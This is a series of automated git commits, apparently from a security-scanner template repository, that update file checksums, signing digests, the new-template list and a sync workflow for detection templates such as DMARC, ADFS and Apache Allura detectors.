+http/technologies/wordpress/plugins/smart-slider-3.yaml:0261ca0102754ae424798049758fba0a8eab989b +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:0f6e12ee31e0e9ce049dde916dab76eb5ce89599 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:9edb30d645fe661041ea30371023297ba0f84558 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 -http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/templately.yaml:c38b29f2acd823339a5f6e47b6da7d81815bf75b -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:2ff53cc8ab79e2209368909504ebcf69fd236d77 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:7743a111682d3c98b42006fe6fee4ab6c10e9d9a +http/technologies/wordpress/plugins/sucuri-scanner.yaml:167837714fb29324f5d9ed149ae14b15dccf0197 +http/technologies/wordpress/plugins/svg-support.yaml:72eeb735ec9f01c4a69fd1f312dd0dc5a66cd349 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:c7548ce19158f03d385da391ee3f7b07a26d776a +http/technologies/wordpress/plugins/tablepress.yaml:3b8fcce3281d05f97941f62f34027c39330acbbb +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:8a63ad445136f67a664be61bc488d48a7be42db6 +http/technologies/wordpress/plugins/templately.yaml:6c6e2b2c55a618ba1b079d3631373241e33089de +http/technologies/wordpress/plugins/the-events-calendar.yaml:bdd9b52ed7949d6720757d1e5edb2d0ea190801b http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:5fc184d6e1eb819dc98519af81c48502b499de9a -http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:04abe0cc2b1cf4de7d3006f3254faab6d156e496 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:2137cd88afffb9633c98efbaf76aa2e5c70847d7 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:e019aa8cfc25a8faa6a42d45b84fb20f37d2a8b7 +http/technologies/wordpress/plugins/under-construction-page.yaml:af366e70b8fc95dce4e8d2b46f10e5bc007e71f3 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:0869ebd3a5621b5613665f63be4e3bdb52d4f58e +http/technologies/wordpress/plugins/updraftplus.yaml:2c4a12b979ea620707afebca080b6aa46ccb3a66 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/user-role-editor.yaml:a65c56f1bb92e3af7f93283d6fc6298ec02758fb http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/w3-total-cache.yaml:45602550c883518190fe4e0a9a65e48446ef72da +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:85ef6f5b148eca06e1eafe17ed5609a5fb54e8dd +http/technologies/wordpress/plugins/webp-express.yaml:7eb073175e1d2f71226682791e56ef0205c73f06 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:c4a6d4a26751a0f0cc9b112b6f8f52dc350dd9a0 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:2b29ec490d95ce80f70bedbd9cbb8c9632a4e811 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:ebc72f277dea2ae763c6d841f79a9ce551d2f707 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:1a7f197c623a0a0c9ed9b7d8339e309959b3517c http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:961b2182decfa0e47bddb3a9435229fb28c9c7d3 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:3e379163d373241c2e7a2ad497824f95689ee220 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:b18acc3af73002b20c5eddf4b2d3590eb22667d5 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:6589a69ae293c750d836223515d4c38179901336 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:532ac6956ef804d95d4e5a525e55c05e91135374 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:f52ce8fa8643bad9b3a4bed9d754d8de38f21db4 +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:28d01ad5fef488960b3e7caf34d81c1f9e9d3276 +http/technologies/wordpress/plugins/woocommerce-services.yaml:f41b52ab1982d2bea2bd2b2a87b41ea592bb635e +http/technologies/wordpress/plugins/woocommerce.yaml:e67a9434b700be7a81ea9962be2fab6ae8f0bf6a +http/technologies/wordpress/plugins/wordfence.yaml:3165603ac638ec0f6873f656a7cbd4884ca5e98c +http/technologies/wordpress/plugins/wordpress-importer.yaml:1aa0e4d0ae01fed575365c8684b76656e16aac5c +http/technologies/wordpress/plugins/wordpress-seo.yaml:da6e45749e46f8e80577e44ff53b56381482820b http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:5e49fe0cc33e1186de691ecb2a3200205d01a211 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 -http/technologies/wordpress/plugins/wp-rollback.yaml:145d49708d027968e845531a36739f52eeb1ff3d -http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:977dd38e8ed67dad650e1bb90aae4b7074ff3ce5 -http/technologies/wordpress/plugins/wp-statistics.yaml:d274d87bcb46e8464ef502d06f790cdb0bf920bd -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/worker.yaml:bcafc63b7cb7713ca3215f6e78051ed5d51c7481 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:2922be9ba3b2ed2f627ebb609f5a0462988e078d +http/technologies/wordpress/plugins/wp-file-manager.yaml:6c7f28e717789b32703381c86cd9d634b756f4be +http/technologies/wordpress/plugins/wp-google-maps.yaml:d26cbbb7f38c29894dc5cfe8c2ec30dfeaa9acc3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:7af2ab66fd854b245f0fd0a2fe06c5e8a3f9a81f +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:31c8824c8c6fd12a33efe790f40a57a1e887f45c +http/technologies/wordpress/plugins/wp-migrate-db.yaml:3e3c3fdeffe38e053ec9b562c5b05900d1e0d624 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:e8f590dd8506c7b68af56c97233a71479d58a587 +http/technologies/wordpress/plugins/wp-optimize.yaml:ada8eb7e5acca0cebc18c13f48a02051fb5d10fb +http/technologies/wordpress/plugins/wp-pagenavi.yaml:be9fc03fa7189ba7686ae14a601de6860a84be8d +http/technologies/wordpress/plugins/wp-reset.yaml:3f442033ca42d4702a5b2fcc294215b331cae50d +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6ab72aeb74671333cfcfaee850d17ca970377424 +http/technologies/wordpress/plugins/wp-rollback.yaml:edbecc16de327ff71dec987c826a6d0c2aeebbaf +http/technologies/wordpress/plugins/wp-seopress.yaml:4415df9803b896355b3c543a05d26daedc647a2c +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:fcfaf9cfd3379e4cc5f8df4d7bd23a94e3fa2bc3 +http/technologies/wordpress/plugins/wp-smushit.yaml:6f3d5602579b5fa837430c255200eaf22ee2bd2e +http/technologies/wordpress/plugins/wp-statistics.yaml:c5ff8a9260bf087f1a7423a6254308caf3466efa +http/technologies/wordpress/plugins/wp-super-cache.yaml:b97164d2dfacb5bf863f4d8435f937553250095e http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:2a0836a4a96a32f47d24b81296267e59394c1a17 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:3b6a6cc314d0ca87744f33034d98a0c7bedcd28d +http/technologies/wordpress/plugins/wpforms-lite.yaml:eed69b2cfde3353a7aa593ed243c6335f5208be3 +http/technologies/wordpress/plugins/wps-hide-login.yaml:66466bb1fc02ad143e2c0ba0658de60cba5147fb +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:4d5a4e881e41fd7d88c97cdbe7bd2c783d73226c http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:390201cca7dd9cf602ab91c37c43371a4fe2bd99 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -7919,7 +7919,7 @@ http/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml:aa21740a09946f84680 http/vulnerabilities/other/eyelock-nano-lfd.yaml:4d7585f47be6a4c23b09cafc420ab8e6583b7614 http/vulnerabilities/other/f-secure-policymanager-log4j-rce.yaml:37163a2939ac4cd8ee348d98fec332ccdf9f22c7 http/vulnerabilities/other/fanruanoa2012-disclosure.yaml:7de55d9312193322c47da705fc415993a17b6b9f -http/vulnerabilities/other/fastadmin-lfi.yaml:7644d1d963191941670db93c777479434dd1d851 +http/vulnerabilities/other/fastadmin-lfi.yaml:865bbe265bb67e3d8580c4861645218d44c438dd http/vulnerabilities/other/fatpipe-auth-bypass.yaml:f4d35fbb62d240efc6740aaa825a7bc0df8b20f3 http/vulnerabilities/other/feifeicms-lfr.yaml:fc9d3c9329a5a481964cfc31f0e7f3e7e1589ef4 http/vulnerabilities/other/finecms-sqli.yaml:2999c4ff5d5ff94783eb74a73689df83303ed7d1 @@ -8759,7 +8759,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c9834d9925a5f118645eec27069d40096bcd49d6 +templates-checksum.txt:f6a8ae043c37ea2d5456d9ad92a8ee6cdc218fa0 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c77273730792d4efb2876f5528cdc38848206708 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 24 Jun 2024 07:30:19 +0000 Subject: [PATCH 0526/1841] Auto Generated Templates Checksum [Mon Jun 24 07:30:19 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 38ebabdaff..f901b5d8a8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -217,7 +217,7 @@ dns/azure-takeover-detection.yaml:5295c90a6fa66f513eca7f6f30eee8745a41aa0a dns/bimi-detect.yaml:bde903bfbcd370747978534ce2391131b12b08f0 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 -dns/dmarc-detect.yaml:d60f87ac8a617c0496d558269abd50389bbb1b37 +dns/dmarc-detect.yaml:ec7a6c51c83c6afd0f426f5adc69e9f2e537cf99 dns/dns-rebinding.yaml:45774e6d0aabacb2fcf032dc41deb3073c8abba6 dns/dns-saas-service-detection.yaml:d43ab2edca6bc38254ad1f4c4889e5cece34691e dns/dns-waf-detect.yaml:305812728bc0395016f22f5b4c04f634a9fb4ad4 @@ -6777,7 +6777,7 @@ http/technologies/4D-detect.yaml:4b948a54eb2718980daa15d0ce2aaf5ee1bf843b http/technologies/abyss-web-server.yaml:2fffb4cde6c7f55d76d6e75695407b177e97455f http/technologies/acontent-detect.yaml:3a895300f93df22d858994bf6851a82f9d38c7d9 http/technologies/activecollab-detect.yaml:ec9b319d550d4c03dbf396dbd92cba208a2accb6 -http/technologies/adfs-detect.yaml:741c3a7959bec29e9672a3f4bb54a6e7818e214d +http/technologies/adfs-detect.yaml:a4af4605bb3fdece63c949a9888ec1bdc3cebe3b http/technologies/admiralcloud-detect.yaml:da6d0bbd87f6e8d763a702761b8f766f235b7b3c http/technologies/adobe/adobe-coldfusion-detect.yaml:cef3ba34ad6eeb269af4e347a9a3d01c4ae652ce http/technologies/adobe/adobe-coldfusion-error-detect.yaml:b8d234bd0084312dd8ec87cab1aac821c0fdd562 @@ -8759,7 +8759,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f6a8ae043c37ea2d5456d9ad92a8ee6cdc218fa0 +templates-checksum.txt:73e9871a9eb670f34f65590581ff093a5f9ec163 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3e07e56bfb1047aff7e8ea85a42fc7c6c9375174 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 24 Jun 2024 07:31:08 +0000 Subject: [PATCH 0527/1841] Auto Template Signing [Mon Jun 24 07:31:08 UTC 2024] :robot: --- http/exposed-panels/ibm/ibm-maximo-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/ibm/ibm-maximo-login.yaml b/http/exposed-panels/ibm/ibm-maximo-login.yaml index 066ad921a7..9cf298c59a 100644 --- a/http/exposed-panels/ibm/ibm-maximo-login.yaml +++ b/http/exposed-panels/ibm/ibm-maximo-login.yaml @@ -48,3 +48,4 @@ http: group: 1 regex: - '(?i)Copyright\s+IBM\s+Corp\.\s+([0-9-]+)' +# digest: 4a0a00473045022035b31e7da2ed71954e539b590f4dcc47d2170ba9cc8c7b3cf57e1e6a38af1022022100e05232abe5d37273dea67f417de81821b439e5fbd2fb71e10e3b82dba393e728:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 382b9c7c9afcaad05f517c360f3fb986c62b76df Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 24 Jun 2024 07:35:03 +0000 Subject: [PATCH 0528/1841] Auto Generated New Template Addition List [Mon Jun 24 07:35:03 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b76b034695..cf3eff6319 100644 --- a/.new-additions +++ b/.new-additions @@ -111,6 +111,7 @@ http/exposed-panels/veeam-backup-manager-login.yaml http/exposed-panels/wildix-collaboration-panel.yaml http/misconfiguration/apache/apache-server-status-localhost.yaml http/misconfiguration/cookies-without-secure.yaml +http/technologies/apache-allura-detect.yaml http/technologies/nperf-server-detect.yaml http/technologies/wordpress/plugins/copy-delete-posts.yaml http/technologies/wordpress/plugins/image-optimization.yaml From 18d145ad57b1d743c0e5e1d8ad242c209af721fd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 24 Jun 2024 07:35:10 +0000 Subject: [PATCH 0529/1841] Auto Generated Templates Checksum [Mon Jun 24 07:35:10 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f901b5d8a8..a29e4e2245 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4056,7 +4056,7 @@ http/exposed-panels/i-mscp-panel.yaml:049d48ab1b7614f1e5b08017b97fa60bce0f3a52 http/exposed-panels/ibm/ibm-advanced-system-management.yaml:fd306898b10a9986f447dce9e8f4a20bfe5b1f29 http/exposed-panels/ibm/ibm-dcec-panel.yaml:85de4a0aac53b7dd180b06e04f837e737a769639 http/exposed-panels/ibm/ibm-decision-server-console.yaml:9bc550d72018a4bb6fd09c5466136ddfb003891e -http/exposed-panels/ibm/ibm-maximo-login.yaml:7193d47b9dc555f1ec3847d3cd8c57d4fdd80257 +http/exposed-panels/ibm/ibm-maximo-login.yaml:5dce11ac4ba10a7c2b8193a6b5f9879740475f79 http/exposed-panels/ibm/ibm-mqseries-web-console.yaml:fe2cb848a2d5afd37b6701deac3321ab96befab9 http/exposed-panels/ibm/ibm-note-login.yaml:8a5f0a28a24b645b7d2e0c499246e08276dfcfcd http/exposed-panels/ibm/ibm-odm-panel.yaml:a4b0d5f8dd884061a745fe85fea95887dc948e23 @@ -6808,6 +6808,7 @@ http/technologies/apache/kafka-manager-panel.yaml:dc3bc4035bc4069f3529349675f2c3 http/technologies/apache/ranger-detection.yaml:15fbdedf1fbe105e4bdbb03b8c6a449097801a74 http/technologies/apache/tomcat-detect.yaml:91e9fd95e5188f7b4529a787f1a7da29335c0647 http/technologies/apache/xampp-default-page.yaml:1a2e9ae4aef8adc79a4a34e693b351bfcc23f8f9 +http/technologies/apache-allura-detect.yaml:e1a5f9c5175f80d3e42b561b5ac86c60ab67ab90 http/technologies/apollo-server-detect.yaml:44245d09c9ad3e3fbca5d699041ac2bd23d329f2 http/technologies/appcms-detect.yaml:1e4a5703053e47d171007ea981900427a88bfab6 http/technologies/apple-httpserver.yaml:17b86c19f29316954819f862cc7d1e371890f4cd @@ -8759,7 +8760,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:73e9871a9eb670f34f65590581ff093a5f9ec163 +templates-checksum.txt:612219ec483cfbf49ea1aadee0315d20d21cfc75 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4da0028f928c3c7953c718073fc0d7a7336ec4c0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 24 Jun 2024 07:35:53 +0000 Subject: [PATCH 0530/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 5812e0d6b7..ab4b48140b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -116,6 +116,7 @@ on: - 'http/exposed-panels/wildix-collaboration-panel.yaml' - 'http/misconfiguration/apache/apache-server-status-localhost.yaml' - 'http/misconfiguration/cookies-without-secure.yaml' + - 'http/technologies/apache-allura-detect.yaml' - 'http/technologies/nperf-server-detect.yaml' - 'http/technologies/wordpress/plugins/copy-delete-posts.yaml' - 'http/technologies/wordpress/plugins/image-optimization.yaml' From 2bf10d9d715c9a331f3b83c5a49ed176dfface07 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 24 Jun 2024 07:36:53 +0000 Subject: [PATCH 0531/1841] Auto Template Signing [Mon Jun 24 07:36:53 UTC 2024] :robot: --- dns/dmarc-detect.yaml | 3 +-- http/technologies/adfs-detect.yaml | 3 +-- http/technologies/apache-allura-detect.yaml | 1 + 3 files changed, 3 insertions(+), 4 deletions(-) diff --git a/dns/dmarc-detect.yaml b/dns/dmarc-detect.yaml index df3d73d376..f62fa1a2e7 100644 --- a/dns/dmarc-detect.yaml +++ b/dns/dmarc-detect.yaml @@ -31,5 +31,4 @@ dns: group: 1 regex: - "IN\tTXT\t(.+DMARC.+)" - -# digest: 4a0a0047304502204076c7a56a64102033ddcbffe604e0099b21d4e3fc93681f25db84b6c9ea0d49022100cc84a29967d71f3d07b107990f34ec5d804757336391661727adf79dc07eef3d:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220335e345c05d8f300441f04a958c88488dbf8883aaa9711617f3ec302812b49e90220519168a5e0b501f2ac00f03ac65505b534dca57cc732d873d26ead8e09c1738a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/adfs-detect.yaml b/http/technologies/adfs-detect.yaml index 1f95fb82e6..a5a8fcadf8 100644 --- a/http/technologies/adfs-detect.yaml +++ b/http/technologies/adfs-detect.yaml @@ -28,5 +28,4 @@ http: group: 1 regex: - 'var\s+userNameValue\s*=\s*''([^\\]*)\\' - -# digest: 4a0a0047304502200fd3109b341765721cc300a6fc04830ccc8d78a68883b3b08ed48841c3ba1ad3022100a01920ae98b24f8b98962e684308e29f8f3f285540b18504211ad783d94990e4:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e9eb95794b5a4d8caa628cd3bf3a52b902b1958a250bfec5e6c7f9798e12262f022100db220f7c5b1b6eaabd6405c5292ade83f775623c355eeb6ea6001c44ed63243e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/apache-allura-detect.yaml b/http/technologies/apache-allura-detect.yaml index 1e14dfc5e6..295588c9b5 100644 --- a/http/technologies/apache-allura-detect.yaml +++ b/http/technologies/apache-allura-detect.yaml @@ -34,3 +34,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100a5ee992b2db8c3177f63512105b9edc5334b92ef54f4eebd6e286619410448e2022017b46324d40fdad410d71008eb866493a4d26a03a263960b3e7421f62babd108:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 22b840510e70d2fd4ece582a3a8cbe65476c2883 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 24 Jun 2024 08:14:21 +0000 Subject: [PATCH 0532/1841] Auto Generated New Template Addition List [Mon Jun 24 08:14:21 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cf3eff6319..39b9ef9374 100644 --- a/.new-additions +++ b/.new-additions @@ -106,6 +106,7 @@ http/cves/2024/CVE-2024-37393.yaml http/default-logins/mantisbt/mantisbt-anonymous-login.yaml http/exposed-panels/lorex-panel.yaml http/exposed-panels/oracle-application-server-panel.yaml +http/exposed-panels/trellix-panel.yaml http/exposed-panels/turnkey-lamp-panel.yaml http/exposed-panels/veeam-backup-manager-login.yaml http/exposed-panels/wildix-collaboration-panel.yaml From 5bc0e27a1993a6ef53dfdede553f4440bc99599d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 24 Jun 2024 08:14:46 +0000 Subject: [PATCH 0533/1841] Auto Generated Templates Checksum [Mon Jun 24 08:14:46 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a29e4e2245..309fafe281 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -217,7 +217,7 @@ dns/azure-takeover-detection.yaml:5295c90a6fa66f513eca7f6f30eee8745a41aa0a dns/bimi-detect.yaml:bde903bfbcd370747978534ce2391131b12b08f0 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 -dns/dmarc-detect.yaml:ec7a6c51c83c6afd0f426f5adc69e9f2e537cf99 +dns/dmarc-detect.yaml:87b71635c4866ae570925ce93cc7dc8fdd7b7763 dns/dns-rebinding.yaml:45774e6d0aabacb2fcf032dc41deb3073c8abba6 dns/dns-saas-service-detection.yaml:d43ab2edca6bc38254ad1f4c4889e5cece34691e dns/dns-waf-detect.yaml:305812728bc0395016f22f5b4c04f634a9fb4ad4 @@ -4601,6 +4601,7 @@ http/exposed-panels/total-web-solutions-panel.yaml:c792bfbfed0cfe6971fecf0aa42d4 http/exposed-panels/totemomail-panel.yaml:a1f46a2540203c5c3093a82282bb98164bb1bf8b 